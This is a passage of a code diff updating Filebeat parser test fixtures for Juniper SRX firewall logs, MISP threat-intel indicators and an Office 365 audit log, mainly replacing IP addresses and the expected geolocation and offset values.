-<12>1 2020-07-14T14:17:04.733Z SRX650-1 RT_UTM - AV_FILE_NOT_SCANNED_DROPPED_MT [junos@2636.1.1.1.2.129 source-zone="trust" destination-zone="untrust" source-address="23.209.86.45" source-port="80" destination-address="10.1.1.100" destination-port="58954" profile-name="Custom-Sophos-Profile" filename="download.cdn.mozilla.net/pub/firefox/releases/78.0.2/update/win64/de/firefox-78.0.2.complete.mar" action="BLOCKED" reason="exceeding maximum content size" error-code="7" username="N/A" roles="N/A"]
+<12>1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED [junos@2636.81.2.69.144.86 source-address="192.168.1.100" source-port="58071" destination-address="103.235.46.39" destination-port="80" category="cat1" reason="BY_BLACK_LIST" profile="uf1" url="www.baidu.com" obj="/" username="user01" roles="N/A"]
+<12>1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_PERMITTED [junos@2636.81.2.69.144.86 source-address="10.10.10.50" source-port="1402" destination-address="216.200.241.66" destination-port="80" category="N/A" reason="BY_OTHER" profile="wf-profile" url="www.checkpoint.com" obj="/css/homepage2012.css" username="user02" roles="N/A"]
+<12>1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT [junos@2636.81.2.69.144.40 source-address="89.160.20.112" source-port="80" destination-address="10.1.1.103" destination-port="47095" source-zone-name="untrust" filename="www.eicar.org/download/eicar.com" temporary-filename="www.eicar.org/download/eicar.com" name="EICAR-Test-File" url="EICAR-Test-File"]
+<12>1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_SCANNER_DROP_FILE_MT [junos@2636.81.2.69.144.40 source-address="67.43.156.12" source-port="80" destination-address="10.1.1.103" destination-port="33578" filename="www.google.com/" error-code="14" error-message="scan engine is not ready"]
+<12>1 2010-01-29T10:59:59.660Z SRX650-1 RT_UTM - AV_HUGE_FILE_DROPPED_MT [junos@2636.81.2.69.144.40 source-address="10.2.1.101" source-port="80" destination-address="10.1.1.103" destination-port="51727" filename="10.2.1.101/images/junos- srxsme-10.2-20100106.0-domestic.tgz"]
+<14>1 2016-02-18T01:33:50.391Z utm-srx550-b RT_UTM - ANTISPAM_SPAM_DETECTED_MT [junos@2636.81.2.69.144.86 source-zone="trust" destination-zone="untrust" source-name="N/A" source-address="10.10.10.1" profile-name="antispam01" action="drop" reason="Match local blacklist" username="user01" roles="N/A"]
+<14>1 2016-02-18T01:34:50.391Z utm-srx550-b RT_UTM - CONTENT_FILTERING_BLOCKED_MT [junos@2636.81.2.69.144.86 source-zone="untrust" destination-zone="trust" protocol="http" source-address="192.0.2.3" source-port="58071" destination-address="198.51.100.2" destination-port="80" profile-name="content02" action="drop" reason="blocked due to file extension block list" username="user01@testuser.com" roles="N/A" filename="test.cmd"]
+<12>1 2016-02-19T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED_LS [junos@2636.81.2.69.144.86 source-address="192.168.1.100" source-port="58071" destination-address="103.235.46.39" destination-port="80" category="cat1" reason="BY_BLACK_LIST" profile="uf1" url="www.baidu.com" obj="/" username="user01" roles="N/A"]
+<12>1 2011-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT_LS [junos@2636.81.2.69.144.40 source-address="89.160.20.112" source-port="80" destination-address="10.1.1.103" destination-port="47095" source-zone-name="untrust" filename="www.eicar.org/download/eicar.com" temporary-filename="www.eicar.org/download/eicar.com" name="EICAR-Test-File" url="EICAR-Test-File"]
+<14>1 2020-07-14T14:16:18.345Z SRX650-1 RT_UTM - WEBFILTER_URL_PERMITTED [junos@2636.81.2.69.144.129 source-zone="trust" destination-zone="untrust" source-address="10.1.1.100" source-port="58974" destination-address="104.26.15.142" destination-port="443" session-id="16297" application="UNKNOWN" nested-application="UNKNOWN" category="Enhanced_Information_Technology" reason="BY_SITE_REPUTATION_MODERATELY_SAFE" profile="WCF1" url="datawrapper.dwcdn.net" obj="/" username="N/A" roles="N/A" application-sub-category="N/A" urlcategory-risk="0"]
+<12>1 2020-07-14T14:16:29.541Z SRX650-1 RT_UTM - WEBFILTER_URL_BLOCKED [junos@2636.81.2.69.144.129 source-zone="trust" destination-zone="untrust" source-address="10.1.1.100" source-port="59075" destination-address="85.114.159.93" destination-port="443" session-id="16490" application="UNKNOWN" nested-application="UNKNOWN" category="Enhanced_Advertisements" reason="BY_SITE_REPUTATION_SUSPICIOUS" profile="WCF1" url="dsp.adfarm1.adition.com" obj="/" username="N/A" roles="N/A" application-sub-category="N/A" urlcategory-risk="3"]
+<12>1 2020-07-14T14:17:04.733Z SRX650-1 RT_UTM - AV_FILE_NOT_SCANNED_DROPPED_MT [junos@2636.81.2.69.144.129 source-zone="trust" destination-zone="untrust" source-address="67.43.156.12" source-port="80" destination-address="10.1.1.100" destination-port="58954" profile-name="Custom-Sophos-Profile" filename="download.cdn.mozilla.net/pub/firefox/releases/78.0.2/update/win64/de/firefox-78.0.2.complete.mar" action="BLOCKED" reason="exceeding maximum content size" error-code="7" username="N/A" roles="N/A"]
diff --git a/x-pack/filebeat/module/juniper/srx/test/utm.log-expected.json b/x-pack/filebeat/module/juniper/srx/test/utm.log-expected.json
index 42e994e057ec..2750c7af9aac 100644
--- a/x-pack/filebeat/module/juniper/srx/test/utm.log-expected.json
+++ b/x-pack/filebeat/module/juniper/srx/test/utm.log-expected.json
@@ -3,13 +3,6 @@
         "@timestamp": "2016-02-17T23:32:50.391-02:00",
         "client.ip": "192.168.1.100",
         "client.port": 58071,
-        "destination.as.number": 55967,
-        "destination.as.organization.name": "Beijing Baidu Netcom Science and Technology Co., Ltd.",
-        "destination.geo.continent_name": "Asia",
-        "destination.geo.country_iso_code": "HK",
-        "destination.geo.country_name": "Hong Kong",
-        "destination.geo.location.lat": 22.25,
-        "destination.geo.location.lon": 114.1667,
         "destination.ip": "103.235.46.39",
         "destination.port": 80,
         "event.action": "web_filter",
@@ -69,13 +62,6 @@
         "@timestamp": "2016-02-17T23:32:50.391-02:00",
         "client.ip": "10.10.10.50",
         "client.port": 1402,
-        "destination.as.number": 6461,
-        "destination.as.organization.name": "Zayo Bandwidth",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "216.200.241.66",
         "destination.port": 80,
         "event.category": [
@@ -99,7 +85,7 @@
         "juniper.srx.reason": "BY_OTHER",
         "juniper.srx.tag": "WEBFILTER_URL_PERMITTED",
         "log.level": "warning",
-        "log.offset": 319,
+        "log.offset": 323,
         "observer.name": "utm-srx550-b",
         "observer.product": "SRX",
         "observer.type": "firewall",
@@ -129,7 +115,7 @@
     },
     {
         "@timestamp": "2010-02-08T06:29:28.565-02:00",
-        "client.ip": "188.40.238.250",
+        "client.ip": "89.160.20.112",
         "client.port": 80,
         "destination.ip": "10.1.1.103",
         "destination.port": 47095,
@@ -141,7 +127,7 @@
         "event.dataset": "juniper.srx",
         "event.kind": "alert",
         "event.module": "juniper",
-        "event.original": "source-address=\"188.40.238.250\" source-port=\"80\" destination-address=\"10.1.1.103\" destination-port=\"47095\" source-zone-name=\"untrust\" filename=\"www.eicar.org/download/eicar.com\" temporary-filename=\"www.eicar.org/download/eicar.com\" name=\"EICAR-Test-File\" url=\"EICAR-Test-File\"",
+        "event.original": "source-address=\"89.160.20.112\" source-port=\"80\" destination-address=\"10.1.1.103\" destination-port=\"47095\" source-zone-name=\"untrust\" filename=\"www.eicar.org/download/eicar.com\" temporary-filename=\"www.eicar.org/download/eicar.com\" name=\"EICAR-Test-File\" url=\"EICAR-Test-File\"",
         "event.outcome": "success",
         "event.severity": 12,
         "event.timezone": "-02:00",
@@ -158,7 +144,7 @@
         "juniper.srx.tag": "AV_VIRUS_DETECTED_MT",
         "juniper.srx.temporary_filename": "www.eicar.org/download/eicar.com",
         "log.level": "warning",
-        "log.offset": 664,
+        "log.offset": 672,
         "observer.ingress.zone": "untrust",
         "observer.name": "SRX650-1",
         "observer.product": "SRX",
@@ -169,19 +155,22 @@
         ],
         "related.ip": [
             "10.1.1.103",
-            "188.40.238.250"
+            "89.160.20.112"
         ],
         "server.ip": "10.1.1.103",
         "server.port": 47095,
         "service.type": "juniper",
-        "source.as.number": 24940,
-        "source.as.organization.name": "Hetzner Online GmbH",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "DE",
-        "source.geo.country_name": "Germany",
-        "source.geo.location.lat": 51.2993,
-        "source.geo.location.lon": 9.491,
-        "source.ip": "188.40.238.250",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.112",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -191,7 +180,7 @@
     },
     {
         "@timestamp": "2010-02-08T06:29:28.565-02:00",
-        "client.ip": "74.125.155.147",
+        "client.ip": "67.43.156.12",
         "client.port": 80,
         "destination.ip": "10.1.1.103",
         "destination.port": 33578,
@@ -201,7 +190,7 @@
         "event.dataset": "juniper.srx",
         "event.kind": "event",
         "event.module": "juniper",
-        "event.original": "source-address=\"74.125.155.147\" source-port=\"80\" destination-address=\"10.1.1.103\" destination-port=\"33578\" filename=\"www.google.com/\" error-code=\"14\" error-message=\"scan engine is not ready\"",
+        "event.original": "source-address=\"67.43.156.12\" source-port=\"80\" destination-address=\"10.1.1.103\" destination-port=\"33578\" filename=\"www.google.com/\" error-code=\"14\" error-message=\"scan engine is not ready\"",
         "event.outcome": "success",
         "event.severity": 12,
         "event.timezone": "-02:00",
@@ -217,26 +206,25 @@
         "juniper.srx.process": "RT_UTM",
         "juniper.srx.tag": "AV_SCANNER_DROP_FILE_MT",
         "log.level": "warning",
-        "log.offset": 1035,
+        "log.offset": 1046,
         "observer.name": "SRX650-1",
         "observer.product": "SRX",
         "observer.type": "firewall",
         "observer.vendor": "Juniper",
         "related.ip": [
             "10.1.1.103",
-            "74.125.155.147"
+            "67.43.156.12"
         ],
         "server.ip": "10.1.1.103",
         "server.port": 33578,
         "service.type": "juniper",
-        "source.as.number": 15169,
-        "source.as.organization.name": "Google LLC",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "74.125.155.147",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -269,7 +257,7 @@
         "juniper.srx.process": "RT_UTM",
         "juniper.srx.tag": "AV_HUGE_FILE_DROPPED_MT",
         "log.level": "warning",
-        "log.offset": 1323,
+        "log.offset": 1336,
         "observer.name": "SRX650-1",
         "observer.product": "SRX",
         "observer.type": "firewall",
@@ -316,7 +304,7 @@
         "juniper.srx.reason": "Match local blacklist",
         "juniper.srx.tag": "ANTISPAM_SPAM_DETECTED_MT",
         "log.level": "informational",
-        "log.offset": 1595,
+        "log.offset": 1612,
         "observer.egress.zone": "untrust",
         "observer.ingress.zone": "trust",
         "observer.name": "utm-srx550-b",
@@ -369,7 +357,7 @@
         "juniper.srx.reason": "blocked due to file extension block list",
         "juniper.srx.tag": "CONTENT_FILTERING_BLOCKED_MT",
         "log.level": "informational",
-        "log.offset": 1892,
+        "log.offset": 1913,
         "network.protocol": "http",
         "observer.egress.zone": "trust",
         "observer.ingress.zone": "untrust",
@@ -399,13 +387,6 @@
         "@timestamp": "2016-02-18T23:32:50.391-02:00",
         "client.ip": "192.168.1.100",
         "client.port": 58071,
-        "destination.as.number": 55967,
-        "destination.as.organization.name": "Beijing Baidu Netcom Science and Technology Co., Ltd.",
-        "destination.geo.continent_name": "Asia",
-        "destination.geo.country_iso_code": "HK",
-        "destination.geo.country_name": "Hong Kong",
-        "destination.geo.location.lat": 22.25,
-        "destination.geo.location.lon": 114.1667,
         "destination.ip": "103.235.46.39",
         "destination.port": 80,
         "event.action": "web_filter",
@@ -433,7 +414,7 @@
         "juniper.srx.reason": "BY_BLACK_LIST",
         "juniper.srx.tag": "WEBFILTER_URL_BLOCKED_LS",
         "log.level": "warning",
-        "log.offset": 2317,
+        "log.offset": 2342,
         "observer.name": "utm-srx550-b",
         "observer.product": "SRX",
         "observer.type": "firewall",
@@ -463,7 +444,7 @@
     },
     {
         "@timestamp": "2011-02-08T06:29:28.565-02:00",
-        "client.ip": "188.40.238.250",
+        "client.ip": "89.160.20.112",
         "client.port": 80,
         "destination.ip": "10.1.1.103",
         "destination.port": 47095,
@@ -475,7 +456,7 @@
         "event.dataset": "juniper.srx",
         "event.kind": "alert",
         "event.module": "juniper",
-        "event.original": "source-address=\"188.40.238.250\" source-port=\"80\" destination-address=\"10.1.1.103\" destination-port=\"47095\" source-zone-name=\"untrust\" filename=\"www.eicar.org/download/eicar.com\" temporary-filename=\"www.eicar.org/download/eicar.com\" name=\"EICAR-Test-File\" url=\"EICAR-Test-File\"",
+        "event.original": "source-address=\"89.160.20.112\" source-port=\"80\" destination-address=\"10.1.1.103\" destination-port=\"47095\" source-zone-name=\"untrust\" filename=\"www.eicar.org/download/eicar.com\" temporary-filename=\"www.eicar.org/download/eicar.com\" name=\"EICAR-Test-File\" url=\"EICAR-Test-File\"",
         "event.outcome": "success",
         "event.severity": 12,
         "event.timezone": "-02:00",
@@ -492,7 +473,7 @@
         "juniper.srx.tag": "AV_VIRUS_DETECTED_MT_LS",
         "juniper.srx.temporary_filename": "www.eicar.org/download/eicar.com",
         "log.level": "warning",
-        "log.offset": 2639,
+        "log.offset": 2668,
         "observer.ingress.zone": "untrust",
         "observer.name": "SRX650-1",
         "observer.product": "SRX",
@@ -503,19 +484,22 @@
         ],
         "related.ip": [
             "10.1.1.103",
-            "188.40.238.250"
+            "89.160.20.112"
         ],
         "server.ip": "10.1.1.103",
         "server.port": 47095,
         "service.type": "juniper",
-        "source.as.number": 24940,
-        "source.as.organization.name": "Hetzner Online GmbH",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "DE",
-        "source.geo.country_name": "Germany",
-        "source.geo.location.lat": 51.2993,
-        "source.geo.location.lon": 9.491,
-        "source.ip": "188.40.238.250",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.112",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -527,13 +511,6 @@
         "@timestamp": "2020-07-14T12:16:18.345-02:00",
         "client.ip": "10.1.1.100",
         "client.port": 58974,
-        "destination.as.number": 13335,
-        "destination.as.organization.name": "Cloudflare, Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "104.26.15.142",
         "destination.port": 443,
         "event.category": [
@@ -560,7 +537,7 @@
         "juniper.srx.session_id": "16297",
         "juniper.srx.tag": "WEBFILTER_URL_PERMITTED",
         "log.level": "informational",
-        "log.offset": 3013,
+        "log.offset": 3045,
         "observer.egress.zone": "untrust",
         "observer.ingress.zone": "trust",
         "observer.name": "SRX650-1",
@@ -590,13 +567,6 @@
         "@timestamp": "2020-07-14T12:16:29.541-02:00",
         "client.ip": "10.1.1.100",
         "client.port": 59075,
-        "destination.as.number": 24961,
-        "destination.as.organization.name": "myLoc managed IT AG",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "DE",
-        "destination.geo.country_name": "Germany",
-        "destination.geo.location.lat": 51.2993,
-        "destination.geo.location.lon": 9.491,
         "destination.ip": "85.114.159.93",
         "destination.port": 443,
         "event.action": "web_filter",
@@ -626,7 +596,7 @@
         "juniper.srx.session_id": "16490",
         "juniper.srx.tag": "WEBFILTER_URL_BLOCKED",
         "log.level": "warning",
-        "log.offset": 3552,
+        "log.offset": 3588,
         "observer.egress.zone": "untrust",
         "observer.ingress.zone": "trust",
         "observer.name": "SRX650-1",
@@ -654,7 +624,7 @@
     },
     {
         "@timestamp": "2020-07-14T12:17:04.733-02:00",
-        "client.ip": "23.209.86.45",
+        "client.ip": "67.43.156.12",
         "client.port": 80,
         "destination.ip": "10.1.1.100",
         "destination.port": 58954,
@@ -664,7 +634,7 @@
         "event.dataset": "juniper.srx",
         "event.kind": "event",
         "event.module": "juniper",
-        "event.original": "source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"23.209.86.45\" source-port=\"80\" destination-address=\"10.1.1.100\" destination-port=\"58954\" profile-name=\"Custom-Sophos-Profile\" filename=\"download.cdn.mozilla.net/pub/firefox/releases/78.0.2/update/win64/de/firefox-78.0.2.complete.mar\" action=\"BLOCKED\" reason=\"exceeding maximum content size\" error-code=\"7\" username=\"N/A\" roles=\"N/A\"",
+        "event.original": "source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"67.43.156.12\" source-port=\"80\" destination-address=\"10.1.1.100\" destination-port=\"58954\" profile-name=\"Custom-Sophos-Profile\" filename=\"download.cdn.mozilla.net/pub/firefox/releases/78.0.2/update/win64/de/firefox-78.0.2.complete.mar\" action=\"BLOCKED\" reason=\"exceeding maximum content size\" error-code=\"7\" username=\"N/A\" roles=\"N/A\"",
         "event.outcome": "success",
         "event.severity": 12,
         "event.timezone": "-02:00",
@@ -682,7 +652,7 @@
         "juniper.srx.reason": "exceeding maximum content size",
         "juniper.srx.tag": "AV_FILE_NOT_SCANNED_DROPPED_MT",
         "log.level": "warning",
-        "log.offset": 4078,
+        "log.offset": 4118,
         "observer.egress.zone": "untrust",
         "observer.ingress.zone": "trust",
         "observer.name": "SRX650-1",
@@ -691,19 +661,18 @@
         "observer.vendor": "Juniper",
         "related.ip": [
             "10.1.1.100",
-            "23.209.86.45"
+            "67.43.156.12"
         ],
         "server.ip": "10.1.1.100",
         "server.port": 58954,
         "service.type": "juniper",
-        "source.as.number": 16625,
-        "source.as.organization.name": "Akamai Technologies, Inc.",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "NL",
-        "source.geo.country_name": "Netherlands",
-        "source.geo.location.lat": 52.3824,
-        "source.geo.location.lon": 4.8995,
-        "source.ip": "23.209.86.45",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "source.port": 80,
         "tags": [
             "forwarded",
diff --git a/x-pack/filebeat/module/misp/threat/test/misp-test.json.log b/x-pack/filebeat/module/misp/threat/test/misp-test.json.log
index 1d6ba2edb696..d476534d7e94 100644
--- a/x-pack/filebeat/module/misp/threat/test/misp-test.json.log
+++ b/x-pack/filebeat/module/misp/threat/test/misp-test.json.log
@@ -1,4 +1,4 @@
-{"id":"1","event_id":"1","object_id":"0","object_relation":null,"category":"Network activity","type":"ip-dst","to_ids":false,"uuid":"5d2cb906-eff4-40f0-9f1d-10eb7d6a0c26","timestamp":"1490878466","distribution":"5","sharing_group_id":"0","comment":"","deleted":false,"disable_correlation":false,"value":"98.235.162.24","Event":{"org_id":"1","distribution":"3","id":"1","info":"Tor exit nodes feed","orgc_id":"2","uuid":"58dcfe62-ed84-4e5e-b293-4991950d210f"}}
+{"id":"1","event_id":"1","object_id":"0","object_relation":null,"category":"Network activity","type":"ip-dst","to_ids":false,"uuid":"5d2cb906-eff4-40f0-9f1d-10eb7d6a0c26","timestamp":"1490878466","distribution":"5","sharing_group_id":"0","comment":"","deleted":false,"disable_correlation":false,"value":"67.43.156.13","Event":{"org_id":"1","distribution":"3","id":"1","info":"Tor exit nodes feed","orgc_id":"2","uuid":"58dcfe62-ed84-4e5e-b293-4991950d210f"}}
 {"id":"2","event_id":"2","object_id":"0","object_relation":null,"category":"Payload delivery","type":"md5","to_ids":true,"uuid":"5d159be2-d4b4-4d97-9e14-406a02de0b81","timestamp":"1490878466","distribution":"5","sharing_group_id":"0","comment":"","deleted":false,"disable_correlation":false,"value":"89357a1b2e32f2b9bddff94b8136810b","Event":{"org_id":"1","distribution":"3","id":"1","info":"OSINT - OSX/Linker: New Mac malware attempts zero-day Gatekeeper bypass","orgc_id":"2","uuid":"5d159be2-d4b4-4d97-9e14-406a02de0b81"}}
 {"id":"3","event_id":"3","object_id":"0","object_relation":null,"category":"Payload delivery","type":"filename","to_ids":true,"uuid":"5d159be2-d4b4-4d97-9e14-406a02de0b82","timestamp":"1490878466","distribution":"5","sharing_group_id":"0","comment":"","deleted":false,"disable_correlation":false,"value":"f6bf5b8bb2400aad4ac844f2b94a4e556907f35b44c5ff462fb4e70c0208c9de","Event":{"org_id":"1","distribution":"3","id":"1","info":"OSINT - OSX/Linker: New Mac malware attempts zero-day Gatekeeper bypass","orgc_id":"2","uuid":"5d159be2-d4b4-4d97-9e14-406a02de0b82"}}
 {"id":"4","event_id":"4","object_id":"0","object_relation":null,"category":"Bad Domain","type":"domain","to_ids":true,"uuid":"563b3ea6-b26c-401f-a68b-4d84950d210b","timestamp":"1490878466","distribution":"5","sharing_group_id":"0","comment":"","deleted":false,"disable_correlation":false,"value":"f6bf5b8bb2400aad4ac844f2b94a4e556907f35b44c5ff462fb4e70c0208c9de","Event":{"org_id":"4","distribution":"3","id":"4","info":"OSINT Expansion on Systematic cyber attacks against Israeli and Palestinian targets going on for a year by Norman","orgc_id":"2","uuid":"563b3ea6-b26c-401f-a68b-4d84950d210b"}}
diff --git a/x-pack/filebeat/module/misp/threat/test/misp-test.json.log-expected.json b/x-pack/filebeat/module/misp/threat/test/misp-test.json.log-expected.json
index ba55329aaf8a..e24353974642 100644
--- a/x-pack/filebeat/module/misp/threat/test/misp-test.json.log-expected.json
+++ b/x-pack/filebeat/module/misp/threat/test/misp-test.json.log-expected.json
@@ -1,28 +1,25 @@
 [
     {
         "@timestamp": "2017-03-30T12:54:26.000Z",
-        "destination.geo.city_name": "State College",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 40.7957,
-        "destination.geo.location.lon": -77.8618,
-        "destination.geo.region_iso_code": "US-PA",
-        "destination.geo.region_name": "Pennsylvania",
-        "destination.ip": "98.235.162.24",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.13",
         "event.category": "threat-intel",
         "event.dataset": "misp.threat",
         "event.id": "5d2cb906-eff4-40f0-9f1d-10eb7d6a0c26",
         "event.kind": "event",
         "event.module": "misp",
-        "event.original": "{\"id\":\"1\",\"event_id\":\"1\",\"object_id\":\"0\",\"object_relation\":null,\"category\":\"Network activity\",\"type\":\"ip-dst\",\"to_ids\":false,\"uuid\":\"5d2cb906-eff4-40f0-9f1d-10eb7d6a0c26\",\"timestamp\":\"1490878466\",\"distribution\":\"5\",\"sharing_group_id\":\"0\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"value\":\"98.235.162.24\",\"Event\":{\"org_id\":\"1\",\"distribution\":\"3\",\"id\":\"1\",\"info\":\"Tor exit nodes feed\",\"orgc_id\":\"2\",\"uuid\":\"58dcfe62-ed84-4e5e-b293-4991950d210f\"}}",
+        "event.original": "{\"id\":\"1\",\"event_id\":\"1\",\"object_id\":\"0\",\"object_relation\":null,\"category\":\"Network activity\",\"type\":\"ip-dst\",\"to_ids\":false,\"uuid\":\"5d2cb906-eff4-40f0-9f1d-10eb7d6a0c26\",\"timestamp\":\"1490878466\",\"distribution\":\"5\",\"sharing_group_id\":\"0\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"value\":\"67.43.156.13\",\"Event\":{\"org_id\":\"1\",\"distribution\":\"3\",\"id\":\"1\",\"info\":\"Tor exit nodes feed\",\"orgc_id\":\"2\",\"uuid\":\"58dcfe62-ed84-4e5e-b293-4991950d210f\"}}",
         "event.type": "indicator",
         "fileset.name": "threat",
         "input.type": "log",
         "log.offset": 0,
-        "message": "98.235.162.24",
-        "misp.threat_indicator.attack_pattern": "[destination:ip = '98.235.162.24']",
-        "misp.threat_indicator.attack_pattern_kql": "destination.ip: \"98.235.162.24\"",
+        "message": "67.43.156.13",
+        "misp.threat_indicator.attack_pattern": "[destination:ip = '67.43.156.13']",
+        "misp.threat_indicator.attack_pattern_kql": "destination.ip: \"67.43.156.13\"",
         "misp.threat_indicator.description": "Tor exit nodes feed",
         "misp.threat_indicator.feed": "misp",
         "misp.threat_indicator.id": "58dcfe62-ed84-4e5e-b293-4991950d210f",
@@ -45,7 +42,7 @@
         "file.hash.md5": "89357a1b2e32f2b9bddff94b8136810b",
         "fileset.name": "threat",
         "input.type": "log",
-        "log.offset": 460,
+        "log.offset": 459,
         "message": "89357a1b2e32f2b9bddff94b8136810b",
         "misp.threat_indicator.attack_pattern": "[file:hash:md5 = '89357a1b2e32f2b9bddff94b8136810b']",
         "misp.threat_indicator.attack_pattern_kql": "file.hash.md5: \"89357a1b2e32f2b9bddff94b8136810b\"",
@@ -71,7 +68,7 @@
         "file.path": "f6bf5b8bb2400aad4ac844f2b94a4e556907f35b44c5ff462fb4e70c0208c9de",
         "fileset.name": "threat",
         "input.type": "log",
-        "log.offset": 987,
+        "log.offset": 986,
         "message": "f6bf5b8bb2400aad4ac844f2b94a4e556907f35b44c5ff462fb4e70c0208c9de",
         "misp.threat_indicator.attack_pattern": "[file:path = 'f6bf5b8bb2400aad4ac844f2b94a4e556907f35b44c5ff462fb4e70c0208c9de']",
         "misp.threat_indicator.attack_pattern_kql": "file.path: \"f6bf5b8bb2400aad4ac844f2b94a4e556907f35b44c5ff462fb4e70c0208c9de\"",
@@ -96,7 +93,7 @@
         "event.type": "indicator",
         "fileset.name": "threat",
         "input.type": "log",
-        "log.offset": 1551,
+        "log.offset": 1550,
         "message": "f6bf5b8bb2400aad4ac844f2b94a4e556907f35b44c5ff462fb4e70c0208c9de",
         "misp.threat_indicator.attack_pattern": "[dns:question:name = 'f6bf5b8bb2400aad4ac844f2b94a4e556907f35b44c5ff462fb4e70c0208c9de' OR url:domain = 'f6bf5b8bb2400aad4ac844f2b94a4e556907f35b44c5ff462fb4e70c0208c9de' OR source:domain = 'f6bf5b8bb2400aad4ac844f2b94a4e556907f35b44c5ff462fb4e70c0208c9de' OR destination:domain = 'f6bf5b8bb2400aad4ac844f2b94a4e556907f35b44c5ff462fb4e70c0208c9de']",
         "misp.threat_indicator.attack_pattern_kql": "dns.question.name: \"f6bf5b8bb2400aad4ac844f2b94a4e556907f35b44c5ff462fb4e70c0208c9de\" OR url.domain: \"f6bf5b8bb2400aad4ac844f2b94a4e556907f35b44c5ff462fb4e70c0208c9de\" OR source.domain: \"f6bf5b8bb2400aad4ac844f2b94a4e556907f35b44c5ff462fb4e70c0208c9de\" OR destination.domain: \"f6bf5b8bb2400aad4ac844f2b94a4e556907f35b44c5ff462fb4e70c0208c9de\"",
@@ -121,7 +118,7 @@
         "event.type": "indicator",
         "fileset.name": "threat",
         "input.type": "log",
-        "log.offset": 2149,
+        "log.offset": 2148,
         "message": "endgame.hungmnguyen.us",
         "misp.threat_indicator.attack_pattern": "[url:full = 'endgame.hungmnguyen.us']",
         "misp.threat_indicator.attack_pattern_kql": "url.full: \"endgame.hungmnguyen.us\"",
diff --git a/x-pack/filebeat/module/o365/audit/test/04-sharepoint.log b/x-pack/filebeat/module/o365/audit/test/04-sharepoint.log
index ff290c1041b5..d8da6b97d2ff 100644
--- a/x-pack/filebeat/module/o365/audit/test/04-sharepoint.log
+++ b/x-pack/filebeat/module/o365/audit/test/04-sharepoint.log
@@ -1,4 +1,4 @@
-{"ListItemUniqueId": "59a8433d-9bb8-cfef-6edc-4c0fc8b86875", "ItemType": "Page", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx", "Workload": "OneDrive", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "UserId": "asr@testsiem.onmicrosoft.com", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Id": "99d005e6-a4c6-46fd-117c-08d7abeceab5", "CustomUniqueId": true, "UserType": 0, "Version": 1, "EventSource": "SharePoint", "CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ClientIP": "213.97.47.133", "Operation": "PageViewed", "CreationTime": "2020-02-07T16:43:53", "RecordType": 4}
